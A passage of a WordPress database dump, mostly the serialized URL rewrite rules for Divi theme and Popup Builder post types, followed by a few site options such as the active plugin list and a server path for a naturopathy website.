options/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_theme_options/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_theme_options/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"et_theme_options/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:61:\"et_code_snippet_type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:59:\"index.php?et_code_snippet_type=$matches[1]&feed=$matches[2]\";s:56:\"et_code_snippet_type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:59:\"index.php?et_code_snippet_type=$matches[1]&feed=$matches[2]\";s:37:\"et_code_snippet_type/([^/]+)/embed/?$\";s:53:\"index.php?et_code_snippet_type=$matches[1]&embed=true\";s:49:\"et_code_snippet_type/([^/]+)/page/?([0-9]{1,})/?$\";s:60:\"index.php?et_code_snippet_type=$matches[1]&paged=$matches[2]\";s:31:\"et_code_snippet_type/([^/]+)/?$\";s:42:\"index.php?et_code_snippet_type=$matches[1]\";s:43:\"et_code_snippet/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:53:\"et_code_snippet/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:73:\"et_code_snippet/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:68:\"et_code_snippet/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:68:\"et_code_snippet/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:49:\"et_code_snippet/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:32:\"et_code_snippet/([^/]+)/embed/?$\";s:63:\"index.php?post_type=et_code_snippet&name=$matches[1]&embed=true\";s:36:\"et_code_snippet/([^/]+)/trackback/?$\";s:57:\"index.php?post_type=et_code_snippet&name=$matches[1]&tb=1\";s:44:\"et_code_snippet/([^/]+)/page/?([0-9]{1,})/?$\";s:70:\"index.php?post_type=et_code_snippet&name=$matches[1]&paged=$matches[2]\";s:51:\"et_code_snippet/([^/]+)/comment-page-([0-9]{1,})/?$\";s:70:\"index.php?post_type=et_code_snippet&name=$matches[1]&cpage=$matches[2]\";s:40:\"et_code_snippet/([^/]+)(?:/([0-9]+))?/?$\";s:69:\"index.php?post_type=et_code_snippet&name=$matches[1]&page=$matches[2]\";s:32:\"et_code_snippet/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:42:\"et_code_snippet/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:62:\"et_code_snippet/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"et_code_snippet/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"et_code_snippet/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"et_code_snippet/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:44:\"et_theme_builder/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"et_theme_builder/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"et_theme_builder/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"et_theme_builder/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"et_theme_builder/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"et_theme_builder/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"et_theme_builder/([^/]+)/embed/?$\";s:64:\"index.php?post_type=et_theme_builder&name=$matches[1]&embed=true\";s:37:\"et_theme_builder/([^/]+)/trackback/?$\";s:58:\"index.php?post_type=et_theme_builder&name=$matches[1]&tb=1\";s:45:\"et_theme_builder/([^/]+)/page/?([0-9]{1,})/?$\";s:71:\"index.php?post_type=et_theme_builder&name=$matches[1]&paged=$matches[2]\";s:52:\"et_theme_builder/([^/]+)/comment-page-([0-9]{1,})/?$\";s:71:\"index.php?post_type=et_theme_builder&name=$matches[1]&cpage=$matches[2]\";s:41:\"et_theme_builder/([^/]+)(?:/([0-9]+))?/?$\";s:70:\"index.php?post_type=et_theme_builder&name=$matches[1]&page=$matches[2]\";s:33:\"et_theme_builder/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"et_theme_builder/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"et_theme_builder/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_theme_builder/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_theme_builder/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"et_theme_builder/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:39:\"et_template/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"et_template/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"et_template/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"et_template/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"et_template/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:45:\"et_template/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:28:\"et_template/([^/]+)/embed/?$\";s:59:\"index.php?post_type=et_template&name=$matches[1]&embed=true\";s:32:\"et_template/([^/]+)/trackback/?$\";s:53:\"index.php?post_type=et_template&name=$matches[1]&tb=1\";s:40:\"et_template/([^/]+)/page/?([0-9]{1,})/?$\";s:66:\"index.php?post_type=et_template&name=$matches[1]&paged=$matches[2]\";s:47:\"et_template/([^/]+)/comment-page-([0-9]{1,})/?$\";s:66:\"index.php?post_type=et_template&name=$matches[1]&cpage=$matches[2]\";s:36:\"et_template/([^/]+)(?:/([0-9]+))?/?$\";s:65:\"index.php?post_type=et_template&name=$matches[1]&page=$matches[2]\";s:28:\"et_template/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:38:\"et_template/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"et_template/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"et_template/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"et_template/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:34:\"et_template/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:44:\"et_header_layout/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"et_header_layout/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"et_header_layout/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"et_header_layout/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"et_header_layout/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"et_header_layout/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"et_header_layout/([^/]+)/embed/?$\";s:64:\"index.php?post_type=et_header_layout&name=$matches[1]&embed=true\";s:37:\"et_header_layout/([^/]+)/trackback/?$\";s:58:\"index.php?post_type=et_header_layout&name=$matches[1]&tb=1\";s:45:\"et_header_layout/([^/]+)/page/?([0-9]{1,})/?$\";s:71:\"index.php?post_type=et_header_layout&name=$matches[1]&paged=$matches[2]\";s:52:\"et_header_layout/([^/]+)/comment-page-([0-9]{1,})/?$\";s:71:\"index.php?post_type=et_header_layout&name=$matches[1]&cpage=$matches[2]\";s:41:\"et_header_layout/([^/]+)(?:/([0-9]+))?/?$\";s:70:\"index.php?post_type=et_header_layout&name=$matches[1]&page=$matches[2]\";s:33:\"et_header_layout/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"et_header_layout/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"et_header_layout/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_header_layout/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_header_layout/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"et_header_layout/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:42:\"et_body_layout/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"et_body_layout/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"et_body_layout/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"et_body_layout/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"et_body_layout/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"et_body_layout/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"et_body_layout/([^/]+)/embed/?$\";s:62:\"index.php?post_type=et_body_layout&name=$matches[1]&embed=true\";s:35:\"et_body_layout/([^/]+)/trackback/?$\";s:56:\"index.php?post_type=et_body_layout&name=$matches[1]&tb=1\";s:43:\"et_body_layout/([^/]+)/page/?([0-9]{1,})/?$\";s:69:\"index.php?post_type=et_body_layout&name=$matches[1]&paged=$matches[2]\";s:50:\"et_body_layout/([^/]+)/comment-page-([0-9]{1,})/?$\";s:69:\"index.php?post_type=et_body_layout&name=$matches[1]&cpage=$matches[2]\";s:39:\"et_body_layout/([^/]+)(?:/([0-9]+))?/?$\";s:68:\"index.php?post_type=et_body_layout&name=$matches[1]&page=$matches[2]\";s:31:\"et_body_layout/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"et_body_layout/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"et_body_layout/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"et_body_layout/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"et_body_layout/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"et_body_layout/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:44:\"et_footer_layout/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"et_footer_layout/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"et_footer_layout/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"et_footer_layout/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"et_footer_layout/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"et_footer_layout/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"et_footer_layout/([^/]+)/embed/?$\";s:64:\"index.php?post_type=et_footer_layout&name=$matches[1]&embed=true\";s:37:\"et_footer_layout/([^/]+)/trackback/?$\";s:58:\"index.php?post_type=et_footer_layout&name=$matches[1]&tb=1\";s:45:\"et_footer_layout/([^/]+)/page/?([0-9]{1,})/?$\";s:71:\"index.php?post_type=et_footer_layout&name=$matches[1]&paged=$matches[2]\";s:52:\"et_footer_layout/([^/]+)/comment-page-([0-9]{1,})/?$\";s:71:\"index.php?post_type=et_footer_layout&name=$matches[1]&cpage=$matches[2]\";s:41:\"et_footer_layout/([^/]+)(?:/([0-9]+))?/?$\";s:70:\"index.php?post_type=et_footer_layout&name=$matches[1]&page=$matches[2]\";s:33:\"et_footer_layout/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"et_footer_layout/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"et_footer_layout/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_footer_layout/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_footer_layout/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"et_footer_layout/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:40:\"popupbuilder/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"popupbuilder/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"popupbuilder/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"popupbuilder/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"popupbuilder/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"popupbuilder/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"popupbuilder/([^/]+)/embed/?$\";s:60:\"index.php?post_type=popupbuilder&name=$matches[1]&embed=true\";s:33:\"popupbuilder/([^/]+)/trackback/?$\";s:54:\"index.php?post_type=popupbuilder&name=$matches[1]&tb=1\";s:41:\"popupbuilder/([^/]+)/page/?([0-9]{1,})/?$\";s:67:\"index.php?post_type=popupbuilder&name=$matches[1]&paged=$matches[2]\";s:48:\"popupbuilder/([^/]+)/comment-page-([0-9]{1,})/?$\";s:67:\"index.php?post_type=popupbuilder&name=$matches[1]&cpage=$matches[2]\";s:37:\"popupbuilder/([^/]+)(?:/([0-9]+))?/?$\";s:66:\"index.php?post_type=popupbuilder&name=$matches[1]&page=$matches[2]\";s:29:\"popupbuilder/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"popupbuilder/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"popupbuilder/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"popupbuilder/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"popupbuilder/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"popupbuilder/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:12:\"sitemap\\.xml\";s:23:\"index.php?sitemap=index\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:39:\"index.php?&page_id=28&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:5:{i:1;s:25:\"duplicator/duplicator.php\";i:2;s:50:\"google-analytics-for-wordpress/googleanalytics.php\";i:3;s:31:\"popup-builder/popup-builder.php\";i:4;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";i:5;s:39:\"wp-file-manager/file_folder_manager.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','https://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','8','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:5:{i:0;s:71:\"/home/desid573/verdenaturopathy.com.au/wp-content/themes/